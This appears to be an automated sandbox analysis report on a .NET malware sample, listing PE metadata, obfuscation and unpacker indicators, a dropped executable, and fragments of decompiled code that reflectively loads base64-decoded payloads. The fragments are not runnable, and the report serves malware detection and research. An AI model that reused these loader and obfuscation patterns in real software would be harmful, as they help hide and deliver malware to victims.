Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: yt7dW9nyJK.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
Source: 0.2.yt7dW9nyJK.exe.4c90000.4.raw.unpack, Qq.cs	.Net Code: Md System.Reflection.Assembly.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_033A6338 push eax; ret	6_2_033A6341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_033A3AB8 push ebx; retf	6_2_033A3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EF634C push eax; ret	8_2_02EF6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EF15CD push ebx; ret	8_2_02EF15DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_087B7808 push eax; retf	8_2_087B7809
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA30EB push es; retf	11_2_04CA30F2
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA30E7 push es; retf	11_2_04CA30EA
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA3031 push es; retf	11_2_04CA3032
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA9290 push esp; retf	11_2_04CA9291

Source: yt7dW9nyJK.exe	Static PE information: section name: .text entropy: 7.980169660583914
Source: ffmaba.exe.4.dr	Static PE information: section name: .text entropy: 7.9803968726190435
Source: ffmaba.exe.11.dr	Static PE information: section name: .text entropy: 7.9803968726190435

Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, MoLs8m78ESt4YD6gORW.cs	High entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, FNiqGIzN6YouuO6eE2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, LjKFJcGnQbFpADmDEj.cs	High entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, h82OGR39MMrSWBIeuA.cs	High entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	High entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, NbgqbDZfxTd3FhSpvT.cs	High entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, zdH4f3pZmi7p2yCYxr.cs	High entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, oXGlh9FSyLkQpmpfLu.cs	High entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, olC9lOqWPHK88HFMTE.cs	High entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, dsMWdeSqEmuJJIBpLr.cs	High entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	High entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, nKKY7Tt52faTCddFBg.cs	High entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, JMKYPcVyVq6QH7wK0M.cs	High entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, vQhmVZmG0JZtewW47V.cs	High entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, wShyhrkNG0qWJND3Sv.cs	High entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, G3L0NIMHLFjsoLjt29.cs	High entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, KoO1A80rKYoteG0Jem.cs	High entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, wqc7bO7TnM3ZX08JehS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, nlGFpdxwrdyqFjguXl.cs	High entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, AdPDqvax914xQbRvHH.cs	High entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, asEp2FfC6uaqQkU7N03Xi7aMe7aH4UsqyvczX1pV8VNDEBWL6.cs	High entropy of concatenated method names: 'j9pYh7fqUtxAzfvnbuJUiOYCEky35MZza4ejy2YYNk96bR44B', 'q1AkQ9L5Ua31gmqDu5aPF3y22uEixfb6ZlGjhoexTZd0qLmZh', 'XXD17AbScLYXpeQx98rahzkAsurbeSScr7tDFtieaoG0hQF5K', 'KL3JvinUZD63lB8cBE5fll4PbD', 'hYodKkMjQwXPC9IRhVwgMwm9D5', 'M56aYRhAnyH1lN7hW7LmazOpIC', 'xtOX9br7PfuNPsxA9oqCuKteVy', 'SSi8CSEb2hT4pPBGrikeSsnWAQ', 'zHefGITeBicsks60NE9F5AYnfi', 'qldqlcyo8chVirjGfIBaIl2z2k'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cs	High entropy of concatenated method names: 'ieoX6VrIxwtQ0f6IPxj01vCOfctxZ5l6ZE0NvjtWknPtwpRYdYVzrRYWzPIGg8WIpwMdndemoXhCbI312', '_38BK1I5SoyOeEOjEuO7IxVars2OjcCgHsEjdqW3FfcNI2nSdSoA6Ny145ZLv2Y3QgnwJUsVZr65zqEbwl', '_86Z1aL9PQfmCZRDJ4oCkARjvaFgfIzRELcAJ1Nc2Iya8HtkxUzVCRA51ZAwGkCudIKGTEzLPQ8p5E1aJL', 'Mps3WRSJwGfNLmVfvSnuZNM6KiMx9FTS0JuyrnTow0MedbgjopKaGEuXs8Qd6ua0ITPnSn0i4FjTd2utM'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, RHrnabkqggf8x5IBqT2LD4ylWiCt2ceO1BQW7adWJ6d509VvOr5xQjaZtlyl9w24v2t1BcynkEhMKVNrepe12LKHR.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'AmkRhiq4pVi2iBvBtP2Bwybsvw65KyK3nCe2860OnGUeTrID2BvBcIVUop8t2pCQvdZOFbzoqsT8FrjSv', 'nJI63nP0qabprjzbDKLQTo24cK9H5b9buvOuCJHijpfhJxmY3YhhQJN2VvGF49INiiJZJkXYitl4O0M8f', '_8srhG0pKEeotPLJFpLjfJZfJIBLhT6CIGM5JqaWtOsFmkiSNqU3ceC9ZHGaCZxsYf5CHU5wwo5s5AElzL', '_6SZXnXIgpwUuaKA1cu8jnBIxvt2YcOEh500Uas57Q5zd2UXkdXEZZatZP9tV5tPpLuTtJNujdJ8bTSYhR'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	High entropy of concatenated method names: 'qUJlaYtxtF3DbhjY', '_99flffu2gimXsrEvebANqrnCeLyGXDPlUR2jFNroY7z0SkWIpjEoL9v1wLRRFYStaERNXiDzM7KYmJrepx36sjnte70k7yL9GR', 'HOwVothBZbpt3MhCNzc7vZd4HU9mMZAhgshlneBdv2h5ZbK9DFVm3a2qSrciZ0OwL8Oot59rmHBc6yFuLEOTTygwL43snDyxD6', 'YlFRwAvV4R41VmGHmOT32RhVbtjp7b27d3dxRiFkqlcbCluFZexiefjrnsuljXYiTSB9yEbjVHaDopCdVjsydlt8udD1Sk5pmK', 'jcnMb4QQhDa5eCURI8L9eKMDayfrk94eDSxDyXY75Sxcgu1P5dwYXn8DvDfYnXcmvhNdVZSEprhGsDr7cLdf0KQEFyVB0nTWYy'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	High entropy of concatenated method names: 'bE6Skcym1E8q1JpQvrrx3A2mPNyEYmA', '_48a39vrGguHmHwaVwCYAXZzl4LFopMc', 'KCB2eIA3VC5QdcTQ7vcWdKgaQ7sBGeN', 'sfRlsl7nZqZfuf0SM1QN7yUx75H53Rh', 'XqXnqcxyHckdUfZccMZiGWEtvihJFaC', 'CumF6z080eUonkPpjiEt8hXsb7DITXb', 'n1xP1ZOmmaiWJwC1ugklwqoJ9HSjjAZ', 'kwM3uET4iWbN6eslWcLIYG7tJxzzeK0', 'Xff0w9u7Bfzj323rrg1udqMDCrc859R', 'Hv0sdAhGuJ7WgE8AEe4vW19hUFftosp'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	High entropy of concatenated method names: 'L5f6jbsrgh8yYymy', 'ggsKYphZwRQlM9am', 'Ph8AevJTp2T7ku20', 'IZCHUE2BDP769cUK', '_30rMMePn4gqbT3MH', '_6HZ8rTmwlKI6LdOE', 'r6MU5kcfW4EjU7lv', 'dCKW9WrLdnh9EaZV', 'cCVgQOQCfSUo347X', '_46XjgzRDLUSXjJjo'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, 46Vktqg7CAqVoJ3pXlNy6niu94YrpPriQQA765ga1y8jmqBJ9nrC0PNeoqVxX5rB8GTaZOIbxholzAhW49uLNc62H.cs	High entropy of concatenated method names: 'QS5snepBdQqcCOHSQp7wjYIBy9LdLD9JeyjCxuIbYWVwJ8jOguYWzcEYOC4LkBruRMAZhszhYztkH84KxhUkBmDzV', '_8VMPhDzpud4K0D4TquEusHJXknWPp7fke5kLaX1wtC0z6RrzbmqhggU9TgpCzBalnWms12hoRs1GdRw6jJwpKDU0Q', 'YBwBC1vWAUZiHjfk8nlWB5TcSRA3oPClfq6cPLrfFkoZD0CwZLN6fcGYrg2DOmIWL8fXIbXVLEWwreT4mJumY5zT7', 'zSUF79XylEJaKsEdJqtLmyb0MSbrsRFB8XsPazAu1IuUs2ZXHZkJGI31Vr4YG4yWGX1UfDD2SFJAv7sVINYQS9IW4', 'nqyYJVzhH9i1KcWmyuaLVZXlO6uZcbtvsbE9b2Y0AKTbQisK6v8LvtwrKfkcKfpCz3z567Dtj9DC5UsxsdkEN6ava', 'dCvu9PJyf7MfVS1Npc3fjhG4LSnT13v7ZN2PeUNDI9POEyjyIRUvYcaF3ABpvbu33ocVz90ihZhBEfF5BN74LMJSJ', 'JT9wDkQa6v6BdWcpbWa9WMRL3vomRHBYI0vfMhCmDg6lI1Ww2tVtA3m7AzfQA8flQbppxXKI3INXriEyYsqCUqVSq', 'SqFODOrdzvoFFQEH3vzqJpRU1o5IAywpH5Vy0K3IWfcxtEZpgEmkrLtqIsjRSB9QFq7ByCwUKbdO9S9hhRn7HeYHX', 'pGosDhHzyNeePTKPyTwr9m1xQ7KPu7GqfgyuwDSXCMZXF9hdeckF9CRPraIcI2VjcsGqlCzItThdntkZfUi85xgYx', 'KVcOKWHq70Jo70xfPEvBXDyLWzeapKnSm6ZqpwSQo4jmCd3aG92qkTHeMx612ghHxliNVcFiSakEsgUs2CX9VXuqS'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, IklJR9Egrci7AkoDGmrtlQz9KpfApOw.cs	High entropy of concatenated method names: 'Poc96CYK8OSv52z26hmXZfOp7tWv8TF', 'ExuBL3pMYZSl9913WmNbxDZhYMOjBN6', 'ecPnLK2QepjkslfNCNM1nmU9Zaz6qQu', 'rOn9thVJbMyWyrQ7urXne23OOfLKV2DnfdDEKYSs33EFmusn9TAHdExLeOqe0WnzQ0W3yUxX3hlrORKwlSbnSbxfYxFny93zD2', 'n1Kt8jjnVKwMzP4XvhIWNdjNoiHo380FoO5AfnzYBQsb2S5BSVVwbEgpADjXymXkk2K5MFA1JwtoQOkD2maMetNhc4ey4z0sra', 'bNvU1zkRVYVglK41nyb6EyKDl0mRGa5rSs56jXXGb5FkVeHpLeAaWAX3uXAbHPkPKIXiAkmCO5YJNWmTBPOmEEmQvsRvVEAT3J', 'EaUqAvoIBKIqK7lROQeEZKTApSVnfkl3jzK0Gs3HoXgVMEZssVglXUsgK8TOUzDwElRPPqWHnWsQlL2JNoOtI4Oo16AdBQ5lPa', 'GWSgsyBxh2AdxW4HIL87cGlfJCD1VRlsSaUSET9aSS7BZJXNTWSzviaSJHzSRN2HATJlo9RkRUlsrN32NWN0oocgt12kBeBEIN', 'dQojCAMlnWTBRn4ep59rv6Yy8JDR8lKfOz8mGgStmHyugnuDELiXXOy98H1uqD69PCfzjXK5L7IvLA9RXX6r9f4YruF6Ylwfgc', '_9Q0ogs17qwzhJbUyXr16HTr3BRGn4QvnoHycknKeIUDOFNZVnxlnQr5ljgSNWmkKwKTVjpEqIiDYjAKNpdwaApjPDu4jGxpZL5'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	High entropy of concatenated method names: 'f6umHbcSKUEeCW91ooOAfJl9PjsmMaH', 'wkAIiThNH8epac4Ok3Gy0sk1E1UyokG', 'mJQi8aQlYBH680bsbDAcLkSWUticyzq', 'YDaJPmh0IV3zBUCXDBCT901fLwqEdOm', '_5MZAwH4gj3KSlo2yJJoL5thDudhywuf', 'gha1t9V6cwzsPueRtGncNgrVjVWduZI', 'RmzNMxHPsPlMoCYGw4xljeH3pUmG1D1', 'vKORDnbaXqyihIjqVcVn6FuJuirt36x', 'e0socU8SbuUz6ZcaJsyGEJcP8BpPuea', '_9kxN9kzg5bQyCJ2LwwMR8FggoKWuSzf'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, rlPW4lL6JzpBKG5uTpUgtMKAdxQudep.cs	High entropy of concatenated method names: 'kBIJXv5a6rottIG83i4vMNxD8FeQAsJ', 'UXPzojRBKx1Oqz9xM4hqjeBMRGFhilZb0DpPekrUZrUFBwX4Z6QKRfIR8Q6VLG5yCxn4FdHJAk7DF12DySdVEngK8AbS6420Ua', 'N93RaNm3kVfs5sBwuxwa1snrEURzE4gpyKg3PFeRmsWQ9grkjjjD6u8KC4NOAbTgcEFuj1CrJWLrxbiBtYbrDDtY1SSUUupQr9', 'XGroXQIR91D3l4CCUv1lCuJWuRjTdcWOzPqUdCqRyHMdqmHUR0ueHXMI2rBwVL1VXstJIcfgV1hQJu7FIn7U6ueRyPjsNM3EI2', 'BqnIh4cGt3g5rOqBfzaULbx9adX0obHUPSD6WWd285Qc4G9Lax9PXlcBSFQtHOvaF5dDdTN9DNl6QLUPu8fh16LhQmfiOzzPBt'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, MoLs8m78ESt4YD6gORW.cs	High entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, FNiqGIzN6YouuO6eE2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, LjKFJcGnQbFpADmDEj.cs	High entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, h82OGR39MMrSWBIeuA.cs	High entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	High entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
